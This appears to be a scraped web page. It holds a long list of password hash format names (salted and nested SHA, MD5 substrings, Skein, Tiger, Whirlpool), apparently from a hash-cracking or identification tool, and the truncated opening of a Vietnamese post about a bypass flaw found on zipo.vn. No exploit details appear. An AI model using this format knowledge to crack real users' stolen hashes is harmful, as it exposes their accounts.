sha1(sha256($pass))
sha1(strtolower($username).$pass)
sha1(strtoupper($username).0x3A.$pass)
sha1(strtoupper($username).0x3A.strtoupper($pass))
sha224($pass.$salt)
sha224($salt.$pass)
sha256($pass.$salt)
sha256($pass.0x5F.strtolower($username))
sha256($salt.$pass)
sha256($salt.sha1($pass))
sha256($salt.sha256($pass))
sha256($salt.strtoupper(sha1($pass)))
sha256(base64_encode(md5($pass)))
sha256(base64_encode(sha1($pass)))
sha256(hex2bin(sha256($pass)))
sha256(md5($pass))
sha256(md5($pass).$pass)
sha256(md5($pass).$salt)
sha256(md5($pass.$salt))
sha256(md5($salt.$pass))
sha256(sha1($pass))
sha256(sha1($pass).$salt)
sha256(sha256($pass))
sha256(sha256($pass).$salt)
sha256(sha256($salt.$pass).$pass)
sha256(strtoupper($username).0x3A.$pass)
sha384($pass.$salt)
sha384($salt.$pass)
sha512($pass.$salt)
sha512($salt.$pass)
sha512($salt.md5($pass))
sha512(md5($pass))
sha512(md5($pass).$salt)
sha512(md5(md5($pass)))
Skein-1024(384)
Skein-1024(512)
Skein-1024
Skein-256(128)
Skein-256(160)
Skein-256(224)
Skein-256
Skein-512(128)
Skein-512(160)
Skein-512(224)
Skein-512(256)
Skein-512(384)
Skein-512
Snefru-128(HMAC1)
Snefru-128(HMAC2)
Snefru-128
Snefru-256(HMAC1)
Snefru-256(HMAC2)
Snefru-256
SSE2
SSHA-1
SSHA-256
SSHA-384
SSHA-512
Streebog-256
Streebog-512
strrev(md5($pass))
strrev(md5(strrev(md5($pass))))
substr(md5($pass),0,10)
substr(md5($pass),0,16)
substr(md5($pass),0,20)
substr(md5($pass),0,30)
substr(md5($pass),0,8)
substr(md5($pass),0,8).substr(md5($pass),27,5)
substr(md5($pass),1,26)
substr(md5($pass),12,20)
substr(md5($pass),16,16)
substr(md5($pass),8,16)
substr(md5(md5($pass)),0,16)
substr(md5(md5($pass.$salt)),0,8)
substr(sha1($pass),0,16)
substr(sha1($pass),0,30)
substr(sha1($pass),0,32)
substr(sha1($pass),0,38)
substr(sha1($pass),0,8)
substr(sha1(md5($pass)),0,32)
substr(sha256($pass),0,16)
substr(sha256($pass),0,32)
substr(sha256($pass),0,40)
Sybase ASE
Tiger-128(HMAC1)
Tiger-128(HMAC2)
Tiger-128
Tiger-160(HMAC1)
Tiger-160(HMAC2)
Tiger-160
Tiger-192(HMAC1)
Tiger-192(HMAC2)
Tiger-192
Ventrilo
WBB4
Whirlpool($pass.$salt)
Whirlpool($salt.$pass)
Whirlpool(HMAC1)
Whirlpool(HMAC2)
Whirlpool



Concobe



Lỗ hổng toàn bộ hệ thống zipo.vn và trách nhiệm.

Hôm rồi tôi có phát hiện một lỗ hổng trên website chính của một cty thiết kế website khá lớn ngoài Hà Nội cho phép tôi có thể bypass các rào...